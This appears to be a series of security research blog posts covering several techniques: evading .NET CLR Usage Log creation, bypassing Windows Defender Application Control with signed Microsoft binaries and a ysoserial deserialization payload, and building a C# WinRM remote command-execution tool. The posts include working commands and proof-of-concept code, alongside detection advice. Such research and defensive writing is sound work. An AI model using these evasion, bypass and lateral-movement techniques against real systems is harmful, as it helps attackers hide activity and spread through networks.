Upon inspecting the UsageLogs directory, a file named test.exe.log is created that contains assembly module information:

Next, let’s remove the test.exe.log file from the UsageLogs directory to demonstrate tampering behavior:

Before re-executing the .NET application, let’s validate the existence of the .NETFramework registry (sub)key in HKCU with the following command:

reg query "HKCU\SOFTWARE\Microsoft\.NETFramework"

In this case, the Registry key exists and does not contain additional values or subkeys. (Note: If the .NETFramework key does not exist, it can be created). Next, add the NGenAssemblyUsageLog configuration knob string value to the .NETFramework key and verify the change:

reg.exe add "HKCU\SOFTWARE\Microsoft\.NETFramework" /f /t REG_SZ /v "NGenAssemblyUsageLog" /d "NothingToSeeHere"
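The change can then be verified with a query such as the following (a sketch; the value data should match the arbitrary string set above):

```
reg query "HKCU\SOFTWARE\Microsoft\.NETFramework" /v NGenAssemblyUsageLog
```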

The program is executed again:

And as expected, the test.exe.log file does not appear after viewing the contents of the target UsageLogs directory:

So you may be asking – what does the CLR do when you supply the NGenAssemblyUsageLog knob with an arbitrary value? Well, it really just inserts the arbitrary string into a ‘properly’ constructed path. For instance, if we set the path data to ‘eeeee’ and execute a .NET application, the CLR inserts the string value into the constructed path:

Since the path is not found, the Usage Log does not write to disk. As shown in the following screenshot, the partial UsageLogs path suffix is hardcoded and pulled from clr.dll:

Adjusting .NET Configuration Knob Environment Variables To Evade CLR Usage Log File Creation

CLR configuration knobs can also be configured by setting environment variables with the COMPlus_ prefix. In the following example, COMPlus_NGenAssemblyUsageLog is set to an arbitrary value (e.g. ‘zzzz’) in the Command Prompt. When PowerShell (a .NET application) is invoked, the COMPlus_NGenAssemblyUsageLog environment variable is inherited from the parent cmd.exe process:
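Sketched as a Command Prompt transcript (the value is arbitrary):

```
C:\> set COMPlus_NGenAssemblyUsageLog=zzzz
C:\> powershell.exe
```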

After exiting PowerShell, we note that the Usage Log file (powershell.exe.log) is never created in the UsageLogs directory:

When Adam Chester (@_xpn_) blogged about the discovery of the ETWEnabled .NET CLR configuration knob for disabling ETW processing, he published a spoofing proof-of-concept that injects the COMPlus_ETWEnabled environment variable when launching a child process. After modifying a few variables in the program, the same spoofing technique can be used to disable the Usage Log output, as shown in this code snippet:

After compiling and executing the program, PowerShell.exe is launched with the COMPlus_NGenAssemblyUsageLog environment variable set to an arbitrary value of “zz”:

And as expected, the Usage Log is never created after exiting the PowerShell session:

Note: the modified environment variable spoofing POC can be found here.

Disrupting the CLR Usage Log Output Operation via Forceful Process Termination

.NET Configuration Knobs provide an elegant way to influence log flow. However, there are methods for disrupting the Usage Log creation process without having to make configuration changes. These methods pose greater risk for disrupting process and program workflow.

Usage Logs are generated when a process exits ‘gracefully’. This occurs when an assembly completes the execution process, such as when using an implicit or explicit return statement or when using the Environment.Exit() method in (C#) managed code:

However, if the process is forced to terminate, the Usage Log process is disrupted and never written to disk. As an example, the Process.Kill() method can be used to achieve the desired result (at the risk of losing data or a shell):
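The two exit paths can be contrasted in a minimal, hypothetical C# sketch (not the original POC):

```csharp
using System;
using System.Diagnostics;

class ExitDemo
{
    static void Main(string[] args)
    {
        if (args.Length > 0 && args[0] == "kill")
        {
            // Forceful termination: the process is torn down immediately,
            // so the CLR shutdown path that writes the Usage Log never runs.
            Process.GetCurrentProcess().Kill();
        }

        // Graceful exit: CLR shutdown completes and the Usage Log is written.
        Environment.Exit(0);
    }
}
```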

Disrupting the CLR Usage Log Output Operation via Module Unloading

In another interesting, albeit risky, testing scenario, tampering with loaded modules (DLLs) can be used to disrupt CLR Usage Log creation by destabilizing the process and causing it to exit prematurely. To accomplish this, we leverage .NET delegate function pointers and the powerful DInvoke library authored by The Wover (@TheRealWover) and b33f (@FuzzySec). For the test case, a delegate function pointer is declared for the FreeLibrary() Win32 API function, which is called to unload modules from the running .NET managed process. Removing a single module or a lesser combination of modules could potentially achieve the same effect; however, we will unload several .NET modules to increase the chances of making the process unstable enough to force termination and disrupt Usage Log creation. (Note: We are picking on .NET modules here, but other DLLs could be unloaded as well.)

To successfully unload a module, we must first get a pointer to the address of the FreeLibrary() function with DInvoke’s GetLibraryAddress(). Then, we convert the function pointer to a callable delegate for the FreeLibrary() API method with the GetDelegateForFunctionPointer() method from .NET ‘Interop’ services. Next, we get a handle to each of the loaded modules (DLLs) by searching for each module’s base address reference in the Process Environment Block (PEB) of our .NET process with DInvoke’s GetPebLdrModuleEntry() method. Lastly, we call the FreeLibrary delegate function with the handle to each module to unload it from memory. The POC code for this test case appears as follows:
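The steps above can be condensed into a C# sketch, assuming the DInvoke library is referenced (the module list and method usage are illustrative, not the original POC):

```csharp
using System;
using System.Runtime.InteropServices;
using DInvoke.DynamicInvoke;

class UnloadDemo
{
    // Delegate signature matching kernel32!FreeLibrary
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    delegate bool FreeLibraryDelegate(IntPtr hModule);

    static void Main()
    {
        // 1. Resolve the address of FreeLibrary() via DInvoke
        IntPtr pFreeLibrary = Generic.GetLibraryAddress("kernel32.dll", "FreeLibrary");

        // 2. Convert the function pointer to a callable delegate
        var freeLibrary =
            Marshal.GetDelegateForFunctionPointer<FreeLibraryDelegate>(pFreeLibrary);

        // 3/4. Locate each target .NET module via the PEB and unload it,
        //      destabilizing the process so it terminates before the
        //      Usage Log is written.
        foreach (string module in new[] { "clrjit.dll", "clr.dll", "mscoreei.dll" })
        {
            IntPtr hModule = Generic.GetPebLdrModuleEntry(module);
            if (hModule != IntPtr.Zero)
                freeLibrary(hModule);
        }
    }
}
```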

After compiling and executing the code, the Usage Log file creation process is disrupted (as expected):

For more information about DInvoke, check out this fantastic blog post by The Wover (@TheRealWover) and b33f (@FuzzySec). The POC code for unloading DLL modules can be found here.

Defensive Considerations

Continue to monitor Usage Logs files & directories. Implement analytics/signatures/detections for Usage Log creation and modification. Despite the questionable offensive techniques demonstrated here, such detections are still quite valuable. Offensive operators will not always account for Usage Log tampering while executing their .NET tools.

Look for log instances of (irregular) unmanaged binaries and script hosts that would not typically load the CLR to create a Usage Log. Leverage Olaf Hartong’s (@olafhartong) Sysmon-Modular rule config and/or this Elastic Security rule query as a baseline for getting started with a rule set. Additionally, Samir (@SBousseaden) provides an excellent detection tip for monitoring WinRM Lateral Movement using .NET tools.

Furthermore, audit and monitor for attempts to remove Usage Log files, as offensive operators may remove the Usage Log files from disk to cover their tracks. Note: This tradecraft is mentioned in the MENASEC blog post.

Monitor for suspicious .NET runtime loads. Identifying suspicious .NET CLR runtime loads may be an interesting compensating detection mechanism if Usage Log evasions are deployed. Unmanaged processes that load the CLR (e.g. MS Office) could be an indicator of compromise.

Monitor for CLR configuration knob additions or modifications. Roberto Rodriguez (@Cyb3rWard0g) authored a fantastic write-up for detecting the [COMPLUS_]ETWEnabled configuration knob adjustment behavior that includes SACL audit recommendations, Sysmon configuration settings, Sigma rules, and a Yara rule. The same methodologies can be applied to detect [COMPLUS_]NGenAssemblyUsageLog configuration knob modifications. A summary of (replicated) recommendations include the following:

  • Hunt for the addition of the NGenAssemblyUsageLog string in the HKCU\Software\Microsoft\.NETFramework and HKLM\Software\Microsoft\.NETFramework Registry keys. As Roberto points out, Event ID 4657 is generated when the audit object access policy is enabled and the target key is audited for key write/set value events:
  • Hunt for the prepending of COMPlus_ in permanent user/system environment variables (see Roberto’s notes), and temporary environment variables where applicable – e.g. process command line , transcription logs, etc.
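The registry half of this guidance can be expressed as a hedged Sigma-style sketch (field mappings assume a Sysmon-style registry_set log source; tune before production use):

```yaml
title: Potential .NET CLR UsageLog Tampering via NGenAssemblyUsageLog Knob
status: experimental
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith:
            - '\SOFTWARE\Microsoft\.NETFramework\NGenAssemblyUsageLog'
            - '\Environment\COMPlus_NGenAssemblyUsageLog'
    condition: selection
falsepositives:
    - Legitimate .NET development or diagnostics activity
level: high
```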

Monitor for process module tampering. Monitoring for ‘suspicious’ process termination events may not be practical in most organizations. However, unloading DLLs from a running process could be an interesting detection opportunity. As described by spotheplanet (@spotheplanet) in this post, module unloads can be traced with the ETW Microsoft-Windows-Kernel-Process provider.

Future Research & Conclusion

If you discover other Usage Log evasion techniques or have improved ideas for detecting them, please feel free to reach out on Twitter and I will link to your resource page. I am currently investigating an “in-depth” technique that may circumvent Usage Log creation, but my current approach hasn’t quite worked out just yet :).

Of note, MSRC was notified of this issue prior to the release of this post. Microsoft does not consider Usage Log evasion a security boundary issue.

And as always, thanks for taking the time to read my posts!

~ Bohops

Exploring the WDAC Microsoft Recommended Block Rules (Part II): Wfc.exe, Fsi.exe, and FsiAnyCpu.exe

Introduction

In Part One, I blogged about VisualUiaVerifyNative.exe, a LOLBIN that could be used to bypass Windows Defender Application Control (WDAC)/Device Guard. The technique used for circumventing WDAC was originally discovered by Lee Christensen, however, it was not previously disclosed like a handful of others on the Microsoft Recommended Block Rules list.

If you are familiar with WDAC, you likely have come across the recommended block rules page at some point and have noticed the interesting list of binaries, libraries, and the XML formatted WDAC block rules policy. Microsoft recommends merging the block rule policy with your existing policy if your IT organization uses WDAC for application control. This is necessary to account for bypass enablers and techniques that are not formally serviced.

In an attempt to unravel the mysteries behind the lesser-known techniques of the ‘blocked’ LOLBINs and further populate the Ultimate WDAC Bypass List, we’ll explore wfc.exe, fsi.exe, and fsianycpu.exe in this quick blog post. Although these LOLBINs are mitigated when the WDAC Recommended Block Rules policy is (merged and) enforced, there may still be other utility, such as EDR evasion and application control bypass, if WDAC block rules are not enforced.

WDAC Configuration

For ease, we leverage the same WDAC configuration from the previous post. Instructions for setting up the enforced User Mode Code Integrity (UMCI) policy at the PCA certificate level can be found here. Since we are examining previously discovered techniques, we must not merge the Block Rules policy (as stated in the directions), else the LOLBINs will be mitigated :-).

After setting up our policy, rebooting, and logging in (as a low privileged user), we validate whether the policy is enforced by checking the results from MSInfo32.exe:

With a quick test to validate the WDAC policy, we can see that our attempt to run a VBScript with COM object instantiation fails due to Code Integrity policy enforcement:

Now, let’s take a quick look at a few interesting LOLBIN bypass enablers…

Wfc.exe Application Control Bypass

Wfc.exe is the Workflow Command-line Compiler Tool and is included with the Windows Software Development Kit (SDK). Like many other Microsoft LOLBINs on the block list, wfc.exe is Microsoft signed since it is not native to the OS:

So, you may be thinking that the “workflow compiler” sounds very familiar. You may recall Matt Graeber’s excellent research and write-up of a WDAC arbitrary code execution bypass for Microsoft.Workflow.Compiler.exe. Wfc.exe is actually the predecessor to the modern workflow compiler and was added to the block list at the same time.

Like Microsoft.Workflow.Compiler.exe, wfc.exe has a library dependency on System.Workflow.ComponentModel.dll for compilation functionality. As Matt points out in his post, System.Workflow.ComponentModel.Compiler.WorkflowCompilerInternal.Compile() calls GenerateLocalAssembly(), which eventually calls Assembly.Load() in the call chain for arbitrary code execution:

Code snippet made possible by dnSpy

Wfc.exe has numerous command line and compiler options. However, all we need to supply is an XOML file that contains our embedded .NET code and constructor. For our proof-of-concept, we’ll leverage Matt’s test.xoml file:

<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
    <CodeActivity x:Name="codeActivity1" />
    <x:Code><![CDATA[
    public class Foo : SequentialWorkflowActivity {
     public Foo() {
            Console.WriteLine("FOOO!!!!");
        }
    }
    ]]></x:Code>
</SequentialWorkflowActivity>

After launching wfc.exe, we can see that the .NET C# code is executed under the enforced WDAC policy:

wfc.exe c:\path\to\test.xoml

In Procmon, we can see that the C# code is compiled with the CSharp compiler then executed by wfc.exe:

Fsi.exe/FsiAnyCpu.exe Application Control Bypass

Fsi.exe and fsianycpu.exe are FSharp (F#) interpreters. These Microsoft signed binaries are included with Visual Studio and execute FSharp scripts via interactive command line or through scripts (with .fsx or .fsscript extensions). Fsi.exe executes in a 64-bit context. Fsianycpu.exe uses “the machine architecture to determine whether to run as a 32-bit or 64-bit process” (Microsoft Docs).

The original execution capability is demonstrated by Nick Tyrer in this tweet with this F# script. Under an enforced WDAC policy, the F# script invokes the Get-Process cmdlet via unmanaged PowerShell:

fsi.exe c:\path\to\test.fsscript
fsianycpu.exe c:\path\to\test.fsscript

…and that’s it! Let’s take a look at a few defensive recommendations…

Defensive Considerations

  • If you deploy WDAC within your environment, consider merging the block rules with your current WDAC policy (or block the LOLBINs with another Application Control solution). If you prefer to go the EDR route, consider integrating analytics/queries to observe blocklist LOLBIN behavior. Additionally, monitor for .NET compiler usage such as csc.exe and cvtres.exe.
  • If enforcement policies are not ideal for your environment, consider using the audit mode features of WDAC (or another Application Control solution) as a source for additional telemetry.
  • As Matt Graeber covers in his blog post and subsequent work with ETW, the need (and accessibility) for optics in .NET are crucial, especially for risky primitives. In a recent post, we demonstrated the ability to collect Assembly.Load() events with a proof-of-concept ETW monitor. The ability to collect, process, and evaluate suspicious .NET events at an enterprise scale should be in reach for capable vendors.
  • For a more interesting overview of Application Control solutions (including WDAC) and links to other great researcher resources, refer to this post.

Conclusion

Thanks for taking the time to read this post. Keep an eye out for Part III of this series in the near future!

~ Bohops

Exploring the WDAC Microsoft Recommended Block Rules: VisualUiaVerifyNative

Introduction

If you have followed this blog over the last few years, many of the posts focus on techniques for bypassing application control solutions such as Windows Defender Application Control (WDAC)/Device Guard and AppLocker. I have not been blogging as much lately but wanted to get back into the rhythm and establish a similar theme for at least the next few posts by exploring the ‘forgotten’ lolbins on the WDAC Microsoft Recommended Block Rules page.

Microsoft Block Rules Primer

If you are familiar with WDAC, you likely have come across the Recommended Block Rules page at some point and have noticed the interesting list of binaries, libraries, and the never ending XML formatted WDAC block rules policy. Microsoft recommends merging the block rule policy with your existing policy if your IT organization uses WDAC for application control.

WDAC is considered a formal security boundary. Novel circumvention of an enforced code integrity policy (e.g. executing unsigned arbitrary code) may result in a CVE from Microsoft if the issue is serviced, or a few added deny rules within the block rules policy (dedicated in your honor, of course).

The decision-making process for whether to service a bypass vulnerability or add a policy mitigation is something that I do not fully understand. Speculatively, the decision tree is complex, and I’d imagine that the decision usually boils down to impact, cost (level of effort), and time. Regardless, the block rules policy is essential for mitigating the residual risk of discovered WDAC bypass techniques…especially those caused by pesky lolbins.

There was something mentioned about forgotten

In the last few years, there have been a lot of great posts and presentations about WDAC internals and circumvention. I decided to centralize the various public write-ups for easier accessibility in a common place (which is a work in progress) as well as (somehow) unravel the mysteries behind the publicly undocumented techniques of those lolbins on the block rules page, which still may have utility for a variety of use cases (e.g. app control policy oversight). My simple notes on the matter can be accessed here until a better solution is adopted. Now, let’s take a look at one of these interesting lolbins: VisualUiaVerifyNative.

Circumventing WDAC with VisualUiaVerifyNative

While going through the ‘undocumented’ candidates on the WDAC list, VisualUiaVerifyNative stuck out to me because I recalled seeing it somewhere while learning more about WDAC a few years ago. It turns out that it was actually mentioned within this pull request for RunScriptHelper by Matt Graeber (@mattifestation) in 2017. The original discovery was made by Lee Christensen (@tifkin_), whose discovery methodology for finding bugs is likely way more polished than my own :). Fortunately for us, we already know which lolbin to examine, so the hardest part is done. Let’s dive in to see if we can make sense of how VisualUiaVerifyNative can be used to bypass WDAC.

VisualUiaVerifyNative Background

VisualUiaVerifyNative (visualuiaverifynative.exe) is the GUI executable binary for UI Automation Verify, a “testing framework for manual and automated testing of a control’s or application’s implementation of Microsoft UI Automation” (Microsoft Docs). VisualUiaVerifyNative is included with the Windows Software Development Kit (SDK). On our WDAC test machine, various instances of the binary are located in the following depicted paths:

VisualUiaVerifyNative Analysis

We quickly discover that VisualUiaVerifyNative is a .NET application. Using dnSpy to ‘decompile’ to source code, we come across a very interesting function called ApplicationStateDeserialize() in the MainWindow class. At first glance, a configuration file with a suffix of uiverify.config appears to be loaded and deserialized via BinaryFormatter.Deserialize():

The first time VisualUIAVerifyNative is executed, the configuration file does not exist, but the program will attempt to locate it anyway. If not found, the file is simply created:

In the previous screenshot, we can see that the file is actually named Roaminguiverify.config and stored in the user’s \AppData directory:

Interestingly, the naming of the file appears to be a simple oversight, as the path is missing an escaped “\”. The file should (presumably) reside in the user’s \AppData\Roaming directory.
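Based on the decompiled output, the vulnerable logic boils down to something like the following reconstruction (a sketch only; member names and exact flow are approximations of the decompiled code, not verbatim):

```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

public partial class MainWindow
{
    // Reconstruction of ApplicationStateDeserialize() (approximated, not verbatim)
    private void ApplicationStateDeserialize()
    {
        // GetFolderPath(ApplicationData) ends in "...\AppData\Roaming"; the missing
        // "\" before the file name yields "...\AppData\Roaminguiverify.config"
        string configPath = Environment.GetFolderPath(
            Environment.SpecialFolder.ApplicationData) + "uiverify.config";

        if (File.Exists(configPath))
        {
            using (FileStream stream = File.OpenRead(configPath))
            {
                // BinaryFormatter deserializes attacker-controllable content,
                // including gadget chains such as TextFormattingRunProperties
                var formatter = new BinaryFormatter();
                object state = formatter.Deserialize(stream);
                // ...deserialized state is applied to the application...
            }
        }
    }
}
```

Because the file lives in a user-writable location and is fed straight into BinaryFormatter.Deserialize(), anything that can write to the user’s \AppData directory controls the deserialized object graph.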

Regardless, Roaminguiverify.config is successfully read into the program if it exists, as verified by the following Procmon ETW trace:

Furthermore, a simple screen print of the Roaminguiverify.config contents shows that it is in a serialized format:

Returning our attention to VisualUIAVerifyNative, we note that the application is Microsoft signed. As such, it will likely be allowed to run when a WDAC policy is enforced at (at least) the PcaCertificate level:

To test simple exploitation, a serialized payload is built with the Ysoserial.net project as follows:

ysoserial.exe -f BinaryFormatter -g TextFormattingRunProperties -o raw -c "notepad" > Roaminguiverify.config

The following screenshot verifies payload creation:

In this case, the YSoSerial.Net TextFormattingRunProperties gadget is leveraged for simplicity, as it builds a XAML command payload that uses the .NET Process class (via System.Diagnostics) to execute a command (notepad.exe in this case). After replacing Roaminguiverify.config with our identically named serialized file, payload execution is successful when visualuiaverifynative.exe is launched:

*Note: An exception pops up in this case because the deserialized data is not what the application expects.
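For reference, the TextFormattingRunProperties gadget embeds a XAML payload roughly of the following shape (illustrative; the exact markup YSoSerial.Net generates may differ slightly). When the serialized object is rehydrated, the XAML is parsed and ObjectDataProvider invokes Process.Start():

```xml
<ResourceDictionary
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:System="clr-namespace:System;assembly=mscorlib"
    xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
  <!-- ObjectDataProvider calls Process.Start() during XAML parsing -->
  <ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <System:String>cmd</System:String>
      <System:String>/c notepad</System:String>
    </ObjectDataProvider.MethodParameters>
  </ObjectDataProvider>
</ResourceDictionary>
```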

Excellent! We have an eligible Microsoft signed binary and a deserialization primitive that we may be able to abuse for circumventing WDAC. Let’s put it to the test…

WDAC Configuration

To test the use of VisualUIAVerifyNative deserialization as a vector for application control bypass, a WDAC/Device Guard Code Integrity policy is configured based on the directions located here. For this configuration, a scan policy is created at the PCA certificate level. However, we do not merge the Block Rules policy as stated in the directions so that VisualUIAVerifyNative has a chance to execute :). The following screenshot demonstrates how a WDAC policy is enforced and loaded (following a reboot):

After rebooting and logging in as a low privileged user, we can validate whether the policy is enforced by checking MSInfo32.exe:

Before validating the bypass, let’s perform a quick test to run something that should fail. In this test case, we’ll run a simple JScript payload with cscript.exe.  As expected, the COM object cannot be created due to WDAC Code Integrity policy enforcement:

Next, we copy our serialized payload to the path where we expect VisualUIAVerifyNative to read it. In this case, the following path is expected under the lowpriv account:

C:\Users\lowpriv\AppData\Roaminguiverify.config

Lastly, we launch VisualUIAVerifyNative and see that the serialized payload is executed accordingly. Fantastic!

Defensive Considerations

  • Although not all bypass techniques have been disclosed for block list lolbins, there is still residual risk for opportunistic abuse.
  • If you deploy WDAC within your environment, consider merging the block rules with your current WDAC policy. If you prefer to go the EDR route, consider integrating analytics/queries to observe blocklist lolbin behavior.
  • If enforcement policies are not ideal for your environment, consider using WDAC in audit mode for added visibility and telemetry to complement other security solutions.
  • For a more interesting overview of Application Control solutions (including WDAC) and links to other great researcher resources, refer to this post.

Conclusion

Thanks for taking the time out of your busy day to read this post. I plan to follow up with a few similar posts unless others beat me to the punch (which is very much welcome).

Take Care,

~ Bohops

WS-Management COM: Another Approach for WinRM Lateral Movement

Introduction

Lateral movement techniques in the wonderful world of enterprise Windows are quite finite.  There are only so many techniques and variations of those techniques that attackers use to execute remote commands and payloads.  With the rise of PowerShell well over a decade ago, most ethical hackers may agree that Windows Remote Management (WinRM) became a major part of their “lateral movement toolkit” when the right (privileged) credential or identity was captured.  With “remote” cmdlets like Invoke-Command, *-PSSession, and *-CimSession, ethical hackers rode the WinRM wave because PowerShell made it that much easier to do so. 

PowerShell certainly still has its use cases in today’s climate.  However, the rise of better detection optics and enhanced visibility in version 5+ have made PowerShell less appealing for post-exploitation.  Furthermore, modern tooling has shifted away from PowerShell to managed .NET and (back to) unmanaged C/C++.  Although the offensive trends are shifting, WinRM can still be a viable option (at least, in my opinion).

In this post, we will make a valiant effort to decouple WinRM from PowerShell and take a look at a few other tools that leverage WinRM for remote command execution and lateral movement.  Additionally, we will showcase how we can leverage WSMAN.Automation, a very interesting COM object, to run remote commands over WinRM transport.  To accomplish this, we will walk through the process of building a simple proof-of-concept .NET C# tool.   

Let’s get started…

A Brief Overview of WinRM

Windows Remote Management (WinRM) “is the Microsoft implementation of WS-Management Protocol (Web Services for Management aka WSMan), a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate” (Microsoft Docs). 

As an alternative to DCOM and WMI for remote management, WinRM is used to establish sessions with remote computers over WSMan, which leverages HTTP/S as a transport mechanism to deliver XML-formatted messages.  In modern Windows systems, WinRM HTTP communication occurs over TCP port 5985 and HTTPS (TLS) communication occurs over TCP port 5986.  WinRM natively supports NTLM and Kerberos (domain) authentication.  After initial authentication, WinRM sessions are protected with AES encryption (Microsoft Docs).

Note: The WinRM service must be configured and running in order to accept remote connections.  This can be set up quickly with the winrm.cmd quickconfig command or through Group Policy.  A few more steps may be required for WinRM to accept connections.  Please see this Pentest Lab article for more info.

WinRM Tools & Capabilities

Let’s take a quick look at a few WinRM capabilities (outside of PowerShell):

Winrs.exe

Winrs.exe is a built-in command line tool that allows for the execution of remote commands over WinRM with a properly credentialed user.  The command supports a variety of switches as well as the ability to use alternate credentials for authentication.  Example command usage is as follows:

winrs -r:corp-dc "whoami /all"


Although the tool offers an easy way to invoke remote commands, detection opportunities are relatively trivial.  As Matt Graeber (@mattifestation) points out in this Tweet, the remote process chain for successful command execution is as follows:

svchost.exe (DcomLaunch)-> winrshost.exe -> cmd.exe [/c remote command] -> [remote command/binary]


Additionally, Winrs events are logged on the remote host as Microsoft-Windows-WinRM/Operational (Event ID 91).


Winrm.vbs (As Called Through Winrm.cmd)

Winrm.vbs is a Visual Basic Script that allows administrators “to configure WinRM and to get data or manage resources” (Microsoft Docs).  As discussed in Matt Graeber’s “Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor” whitepaper, WinRM(.vbs) allows for remote interaction with WMI objects over WinRM transport.  This is interesting because several WMI classes can be leveraged to perform remote command execution.  For instance, a very well-known WMI class, Win32_Process, can be used to spawn a (remote) process by leveraging the Create method.  In the following Winrm(.vbs) example, the invoke command spawns a remote notepad.exe process on a host named corp-dc:

winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad"} -r:corp-dc


The Process Identifier (PID) and ReturnValue are returned in XML metadata to confirm successful remote execution:
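Stripped of the surrounding SOAP envelope, the returned Create_OUTPUT resembles the following (illustrative values):

```xml
<p:Create_OUTPUT xml:lang="en-US"
    xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process">
  <p:ProcessId>4264</p:ProcessId>
  <p:ReturnValue>0</p:ReturnValue>
</p:Create_OUTPUT>
```

A ReturnValue of 0 indicates that Win32_Process.Create succeeded on the remote host.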

On the remote host, the process execution chain appears as follows:

svchost.exe (DcomLaunch) -> wmiprvse.exe -> [remote command/binary]


Third-Party WinRM Tools

It is also worth mentioning that other 3rd party WinRM capabilities exist outside of Windows including:

  • Metasploit – Contains modules in auxiliary/scanner/winrm/* and exploit/windows/winrm/*
  • PyWinRM – A Python client to execute remote commands
  • CrackMapExec – Contains a Python WinRM command module
  • Evil-WinRM – A fully featured WinRM shell implemented in Ruby

WS-Management Component Object Model (COM)

At the time I was investigating this topic, I noticed that there was not really much offered in the way of Windows tooling outside of PowerShell that leveraged WinRM for remote command execution/lateral movement.  I decided to take a closer look and discovered some information about the WinRM Scripting API on Microsoft Docs/Windows Dev Center and in a few interesting StackOverflow/message board posts.  Much of the core capability is driven by an underappreciated COM class that works very hard behind the scenes – WSMan.Automation.

Enumerating the WSMan.Automation COM object revealed several interesting methods and properties:


A quick peek at the source code of WinRM.vbs showed that WsMan.Automation was leveraged to establish the WinRM (remote) sessions for management, querying, and invocation:


Furthermore, we can leverage OleView.Net by James Forshaw (@tiraniddo) to take a look at the COM class in greater detail.  These key takeaways are noted:

  • The CLSID is BCED617B-EC03-420B-8508-977DC7A686BD
  • The In-Process server is named WsmAuto.dll
  • The Type Library is called Microsoft WSMAN Automation V1.0 Library, and it is implemented in the WsmAuto.dll library
  • There are two primary supported interfaces of interest – IWSMan and IWSManEx


We now have some background on a vector that we could (potentially) use to develop our own POC WinRM tools.  Let’s dive in…

Building a POC WinRM Remote Command Execution Tool in .NET C#

In this section, we will walk through the process of creating a POC tool – SharpWSManWinRM.exe.

A Brief Note on .NET COM Interop

For .NET, Visual Studio makes integrating (many) COM components (objects) quite seamless.  A COM reference is added to an assembly project by selecting a predefined component in the Reference Manager or by selecting another component file from disk such as an unmanaged library (DLL) or Type Library (TLB) file.  Visual Studio parses the Type Library and maps COM interfaces and classes to a namespace structure within an auto-generated managed interop library (DLL) that is included within the project. 

At runtime, the .NET Common Language Runtime (CLR) creates “Runtime Callable Wrappers” (RCW) to hold interface pointers and marshal calls between .NET and created COM objects (instances).    From a .NET perspective, this makes COM objects appear as .NET objects and “simplifies” the managed code necessary to work with those respective COM objects.

Note: For more information about RCW, please refer to the COM Interop pages on Microsoft Docs.  In some instances, it may be necessary to work with external COM objects that require a manual approach for creating the interop definitions.  For information about manually creating wrappers with Interface Definition Language (IDL) or Type Libraries, refer to this Microsoft Docs write-up.

Setting Up a WSMan/WinRM Project with Visual Studio

After creating a new .NET Framework (4) console application project, add the COM reference by right-clicking the References menu in Solution Explorer and selecting Add Reference:


In the Reference Manager, select Browse and import the WsmAuto.dll file from \Windows\System32\:


Alternatively, the Microsoft WSMAN Automation V1.0 Type Library can be selected from the COM menu in Reference Manager to achieve the same result:


After the Reference is added, Visual Studio kindly generates the Interop.WSManAutomation.dll interop assembly and namespace for interacting with the WSMan Automation COM components as noted in the Reference properties:


With the added Reference, we can now leverage the WSManAutomation namespace in a using statement to access the targeted interfaces, methods, and properties:


Auto-Generated Interop Assembly

Before moving on, let’s take a quick peek into the Interop.WSManAutomation.dll that was auto-generated.  Using dnSpy, we can ‘decompile’ the assembly to view the source code:


We can see how the DLL assembly wraps up the interfaces, methods, and properties in a convenient way for our C# console project to call.  When the project code is compiled, this DLL is merged with the output assembly.

Coding the WinRM POC

With the WSMan.Automation object, we can leverage the same WMI classes for remote command execution that were shown earlier with WinRM.vbs.  This is implemented in our POC C# code (below) as follows:

  1. wsman is our initialized .NET/C# object, which implements the IWSManEx interface that extends the methods and properties of the IWSMan interface.
  2. options is a .NET/C# object that calls the CreateConnectionOptions() method for setting IWSManConnectionOptions, which specifies the username and password (if any are set) for the session.
  3. session is a .NET/C# object that calls the CreateSession() method for establishing the connection with the specified target (sessionUrl). If a username and password are set in CreateConnectionOptions(), the SessionFlagCredUsernamePassword() method sets the authentication flag for the specified target.
    Note: Other flags can be set to specify authentication methods such as Negotiate or Kerberos.
  4. The Invoke() method is called to invoke a WMI class action.  In this case, the WMI Create method (action) is called to specify the creation of a remote process (from Win32_Process).  resource is the retrieved WMI class identifier, and parameters contains the XML input, which includes the process/command to be executed.
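Putting those steps together, the core of the POC looks roughly like this condensed sketch (simplified for illustration; argument parsing, credential handling, and flag constants are trimmed, and type names come from the auto-generated interop namespace):

```csharp
using System;
using WSManAutomation; // auto-generated interop namespace from WsmAuto.dll

class SharpWSManWinRM
{
    static void Main(string[] args)
    {
        string target  = args[0];   // e.g. "corp-dc"
        string command = args[1];   // e.g. "notepad"

        // 1. Initialize the WSMan.Automation COM object (IWSManEx extends IWSMan)
        IWSManEx wsman = (IWSManEx)new WSManClass();

        // 2. Connection options (username/password would be set here if supplied)
        IWSManConnectionOptions options =
            (IWSManConnectionOptions)wsman.CreateConnectionOptions();

        // 3. Establish the session; with no explicit credentials, the
        //    current security context is used
        string sessionUrl = "http://" + target + ":5985/wsman";
        IWSManSession session =
            (IWSManSession)wsman.CreateSession(sessionUrl, 0, options);

        // 4. Invoke the Create method of the Win32_Process WMI class
        string resource =
            "http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process";
        string parameters =
            "<p:Create_INPUT xmlns:p=\"" + resource + "\">" +
            "<p:CommandLine>" + command + "</p:CommandLine>" +
            "</p:Create_INPUT>";

        string response = session.Invoke("Create", resource, parameters);
        Console.WriteLine(response); // XML containing ProcessId and ReturnValue
    }
}
```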


Running the WinRM POC

After compiling the project assembly, we can run it against a target machine and retrieve the Process ID and return information:

Command 1-

SharpWSManWinRM.exe corp-dc notepad

Command 2 (with credentials) –

SharpWSManWinRM.exe corp-dc notepad corp\corpmin CorpM@ster


On the remote host, the process execution chain appears as follows:

svchost.exe (DcomLaunch) -> wmiprvse.exe -> [remote command/binary]


“WSMan-WinRM” Project

